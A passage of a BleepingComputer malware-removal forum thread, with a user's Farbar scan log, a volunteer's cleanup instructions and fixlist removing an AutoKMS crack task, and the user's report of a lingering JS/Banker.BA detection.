MSCONFIG\startupreg: NUSB3MON => "C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\raptrstub.exe --startup
MSCONFIG\startupreg: RGSC => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: uTorrent => "C:\Users\Gianluca\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{FB26CA16-1F78-41D9-9212-EEB3CFC86A1A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{93ECF39C-5F31-4375-862D-347F65610B22}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{230E8410-C477-455D-A8C9-99CDFA60B6F2}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{0CEC2E1F-26F8-4203-B1EC-1BE123D86A6C}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{19E7DF6C-1229-43A1-9D98-022ACF1D7C51}] => (Allow) svchost.exe
FirewallRules: [TCP Query User{FC8CAE3A-1872-414D-8D94-755870FBF5BD}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [UDP Query User{125C4FF4-8DD7-4B9A-ADDF-01A77C431207}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [TCP Query User{CFC33FE1-2CB4-4695-9EE8-0930DB7ADC86}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{343787D2-B4A1-459D-87F5-FBBFA3D809DC}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{DA8BF005-AF20-4FE2-9183-D97B3E3FFF5D}] => (Allow) LPort=21677
FirewallRules: [{EAC16CCC-2F87-4F02-BB06-66DAA37F6F1A}] => (Allow) LPort=24515
FirewallRules: [{4A8A432D-C8B7-41A5-96B7-36056D113CFB}] => (Allow) LPort=21419
FirewallRules: [{51C46967-9BBA-4F62-8B0A-4CAEA9B197E0}] => (Allow) LPort=21885
FirewallRules: [TCP Query User{FB505404-64EF-4F0A-85BD-AD34A44A970D}D:\desktop\winbox.exe] => (Block) D:\desktop\winbox.exe
FirewallRules: [UDP Query User{943B8DC3-53A3-4DE1-94BA-E660403DFA0F}D:\desktop\winbox.exe] => (Block) D:\desktop\winbox.exe
FirewallRules: [{401B6B20-3872-4524-8566-2B28EF2A79B8}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{48325F77-213C-4F3F-A503-6E886394F1DB}] => (Allow) LPort=2869
FirewallRules: [{24D08F4D-2E31-4168-95E1-CF39050E541B}] => (Allow) LPort=1900
FirewallRules: [{032E027D-E459-4393-BCC6-6EF8C7767E1D}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [TCP Query User{B3DB444C-E03B-43AA-9CDE-FDC735418E43}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{95D57C87-28BE-48FC-BBBF-512DAEFDD16E}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [{30D0CCB3-AA5E-4B32-8D6A-668BAD937C0E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{22EC6FEA-6523-4737-BD3F-2C88712B30F5}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\RM.exe
FirewallRules: [{FDE08989-26A5-435D-BB2A-9C19FAF126BE}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\RM.exe
FirewallRules: [{16B9920C-3A91-40DD-A191-5BF35E1C720C}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\Studio.exe
FirewallRules: [{593465EC-7CB0-4543-A318-FC89FC2BB27B}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\Studio.exe
FirewallRules: [{513F68DE-38D3-48B4-8E4C-1B11F21A9000}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\umi.exe
FirewallRules: [{B1E06DBF-0407-4805-A470-6A3EC7D66D75}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\umi.exe
FirewallRules: [{F204C1CF-B8B9-4EBB-A817-B65EF9420657}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F3D3F6D8-DC0E-4C65-AB3A-3D4138BA6EA7}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{CCB8C00E-3400-4E4B-BAE9-D2ACF81AA524}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Stronghold Kingdoms\StrongholdKingdoms.exe
FirewallRules: [{209F1A47-C9B4-466E-A13E-563912F9230E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Stronghold Kingdoms\StrongholdKingdoms.exe
FirewallRules: [TCP Query User{4D6E8E3A-FDCA-48A8-BC3F-2908B462FF5D}C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe
FirewallRules: [UDP Query User{A91D9646-D3FC-4DFC-99D0-8950236C5299}C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe
FirewallRules: [{DE5D1273-6F33-48D7-BFB3-03A508603C96}] => (Allow) C:\Users\Gianluca\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{1A484A1A-D6C4-4AF8-8EC5-A81D2ECB7984}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{15FAD70B-33B2-4C4D-81EB-AB741FD73312}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{2F7D094B-B57A-4EB0-96F9-A4A275106C51}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{9BEB314F-7A25-4AC0-8559-400E018699BA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{098B3942-9C93-4188-9B9C-5C30C6DB14C0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7D84F1DC-5988-4F91-99C0-DFDB035AB222}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7EB6698E-7416-4AFE-A3C4-E475D51544A4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{29925A91-0D2E-4FE2-944B-28FE0970FCC7}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{8EBFCEDF-7FE3-47A1-AC2C-F5B2EE71559D}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{39C573C2-5BB3-4656-BA6F-906817966C28}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{B0329ACA-BCD0-42C8-8EFE-C51172773BB5}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{FBE310CA-2432-4CC9-A83A-ECFEBC19105D}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{78731FF2-A35C-453C-8D7D-253E173CB179}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E0D169D6-D3A5-4BFB-AF25-3786F605318E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{9AA165D6-722C-47CD-97C4-A5E7BAA65DFD}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [UDP Query User{4CAB4E4D-B0C2-4533-A3F6-32F8E6E9F269}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{BF4DFDD7-4557-4454-B569-192EAA368349}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{40AD4E61-C418-4BA1-9F62-E54C9C6629A9}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [TCP Query User{35946E8B-D3BB-4D90-A851-D04C3E872543}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{0FFC3247-D066-47DF-B90E-4864C143530D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{C3A88AD7-EA1E-447B-8873-4E1751AE378B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{1E136EAF-4F09-40D3-9334-1987280472D8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{4E936C24-638D-4541-8D2C-94498B48A7E6}] => (Allow) C:\Program Files\HP\HP LaserJet P1100 Series\wificonfig.exe
FirewallRules: [{ACD8FF8C-E49D-4EB4-B3C6-085157BF3A1C}] => (Allow) C:\Program Files\HP\HP LaserJet P1100 Series\wificonfig.exe
FirewallRules: [{C43776BE-3D9F-4396-998C-85F4E0E02445}] => (Allow) LPort=9100
FirewallRules: [{9DDB1785-7A3D-4935-A54D-C84277A3FE6B}] => (Allow) LPort=427
FirewallRules: [{2D4E2718-6D9E-48D7-9F89-4C531621F240}] => (Allow) LPort=161
FirewallRules: [{5C494057-FF77-4A85-AA09-6DCE55E14B34}] => (Allow) C:\Users\Gianluca\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FC64DC36-0AF6-42A4-AC80-C5B36013455D}] => (Allow) C:\Users\Gianluca\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6C5D1D48-8B75-4C68-92C2-0077A022DD10}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{341ECBF2-5D74-4603-B92D-9BE72DA790D8}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{294275C0-248D-4447-895C-94F7E034A9B8}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{B40AB993-822E-4510-B494-50DCD7FD15A8}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [TCP Query User{E2C9AB04-B157-4426-A3BB-52A23BD43B3B}C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [UDP Query User{BC978ACA-F0AF-402E-99BC-A4F3D7EFDE28}C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [{3081A5A7-2282-4BA3-90B8-CCF5A34B0273}] => (Block) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [{B4100283-0191-4084-B7F5-A84FCD20E9D2}] => (Block) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [{97C1CBCE-6D1F-4B02-B8A3-5977D7C55ED1}] => (Allow) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (08/12/2015 01:17:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 01:15:44 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Attivazione della licenza di Windows non riuscita. Errore: 0x80070005.

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 492: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 11:04:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 11:02:29 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Attivazione della licenza di Windows non riuscita. Errore: 0x80070005.

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 232: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)


System errors:
=============
Error: (08/10/2015 01:15:51 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (07/20/2015 06:41:36 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Timeout (30000 millisecondi) durante l'attesa della connessione del servizio Avira Service Host.

Error: (07/18/2015 01:11:43 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Timeout (30000 millisecondi) durante l'attesa della connessione del servizio Avira Service Host.

Error: (07/16/2015 10:08:27 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Timeout (30000 millisecondi) durante l'attesa della connessione del servizio Avira Service Host.

Error: (07/15/2015 08:09:10 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Timeout (30000 millisecondi) durante l'attesa della connessione del servizio Avira Service Host.

Error: (07/06/2015 08:53:57 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Ricevuto avviso di errore irreversibile: 80.

Error: (07/06/2015 08:47:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Ricevuto avviso di errore irreversibile: 80.

Error: (07/06/2015 08:45:13 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Ricevuto avviso di errore irreversibile: 80.

Error: (07/06/2015 08:08:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Ricevuto avviso di errore irreversibile: 80.

Error: (07/06/2015 07:59:23 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Ricevuto avviso di errore irreversibile: 80.


Microsoft Office:
=========================
Error: (08/12/2015 01:17:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 01:15:44 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: 0x800700050x00000000

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 492: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 11:04:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 11:02:29 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: 0x800700050x00000000

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 232: ERROR: read_msg errno 10054 (Connessione in corso interrotta forzatamente dall'host remoto.)


CodeIntegrity:
===================================
Date: 2015-05-07 11:59:44.365
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\54665465465322111\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2015-05-07 11:59:44.350
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\54665465465322111\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2015-05-07 10:48:03.545
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\54665465465322111\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2015-05-07 10:48:03.545
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\54665465465322111\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2014-11-16 10:43:10.918
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\95175389624\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2014-11-16 10:43:10.902
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\95175389624\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2013-09-17 11:59:20.573
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\157944315879\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2013-09-17 11:59:20.573
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\157944315879\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2012-02-10 21:23:23.085
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\ComboFix\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.

Date: 2012-02-10 21:23:23.070
Description: Impossibile verificare l'integrità dell'immagine del file \Device\HarddiskVolume2\ComboFix\catchme.sys. Impossibile trovare l'hash del file nel sistema. Causa possibile: installazione di un file danneggiato o con firma non corretta in seguito a una modifica hardware o software o malware di origine sconosciuta.


==================== Memory info ===========================

Processor: Intel® Core™ i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 34%
Total physical RAM: 8168.94 MB
Available physical RAM: 5389.32 MB
Total Virtual: 21919.14 MB
Available Virtual: 18318.39 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:272.23 GB) (Free:104.61 GB) NTFS
Drive d: (Volume) (Fixed) (Total:659.18 GB) (Free:331.39 GB) NTFS
Drive f: (ACER) (Fixed) (Total:293.33 GB) (Free:59.47 GB) NTFS
Drive g: (DATA) (Fixed) (Total:293.08 GB) (Free:57.91 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 09436ECC)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=272.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=659.2 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 596.2 GB) (Disk ID: DDE426B1)
Partition 1: (Not Active) - (Size=9.8 GB) - (Type=27)
Partition 2: (Active) - (Size=293.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=293.1 GB) - (Type=07 NTFS)

==================== End of log ============================

Attached Files


Edited by Oh My!, 12 August 2015 - 04:48 PM.


BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,392 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:04:43 PM

Posted 12 August 2015 - 04:59 PM

Greetings GiakMind and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. :)
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
  • Now let's get started :thumbup2:
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Unfortunately there is evidence of pirated software on your computer. If you would like continued help I am going to ask you to remove Microsoft Office Professional 2010 and any other software for which you do not have a valid license. The presence of any pirated software is illegal and hampers our ability to clean your computer. If you are willing to do that let me know when you have completed that and we can continue on. If you prefer to not do that I will be closing the topic.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 GiakMind

GiakMind
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roma, Italy
  • Local time:01:43 AM

Posted 12 August 2015 - 06:13 PM

I unistalled that and other softwares, now I should be ok.

 

New logs in attachment below :)

Attached Files



#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,392 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:04:43 PM

Posted 12 August 2015 - 06:52 PM

Thank you, let's start with this.

===================================================

P2P Warning

--------------------

Going over your logs I noticed that you have µTorrent installed. It is pretty much certain that if you continue to use P2P programs, you will get infected again.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a smörgåsbord of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
I would recommend that you uninstall µTorrent, however that choice is up to you. If you choose to remove the program, you can do so via Start > Control Panel > Add/Remove Programs.

If you are still leaning toward using this program, please take a look at this information about Ransomware which can be delivered via P2P file transfers. The newest variation of Ransomware can make it impossible to recover the files this malicious software encrypts. In other words, you will probably lose most if not all of your valuable information, including pictures. In addition it has recently been reported that P2P downloads may be tracked resulting in your IP address being monitored by copyright authorities. .

If you wish to keep it, please do not use it until we are completely done and your machine is determined to be clean and updated.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

Zoek by Smeenk

--------------------
  • Download Zoek and save it to your Desktop
  • Right click the icon, select Run as Admistrator, and wait for the Program to appear on your Desktop (may take 15 seconds or so)
  • Copy and paste the following into the main box

createsrpoint;
autoclean;
emptyalltemp;
ipconfig /flushdns

  • Verify Scan All Users is selected then click Run Script
  • Do not use your computer while the scan is running
  • When completed a zoek-results.txt report will appear on your desktop. Copy and paste the contents in your reply
===================================================

System Summary Information

--------------------
  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • zoek log
  • System Summary Information
  • Update on computer performance

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#5 GiakMind

GiakMind
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roma, Italy
  • Local time:01:43 AM

Posted 13 August 2015 - 04:41 AM

Every thing requested is in attachment.
After done every passage, JS/Banker.BA still appears when I go in bank site :(

Fix result of Farbar Recovery Scan Tool (x64) Version:12-08-2015
Ran by Gianluca (2015-08-13 11:19:13) Run:2
Running from D:\Desktop
Loaded Profiles: Gianluca (Available Profiles: Gianluca)
Boot Mode: Normal
==============================================

fixlist content:
*****************
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
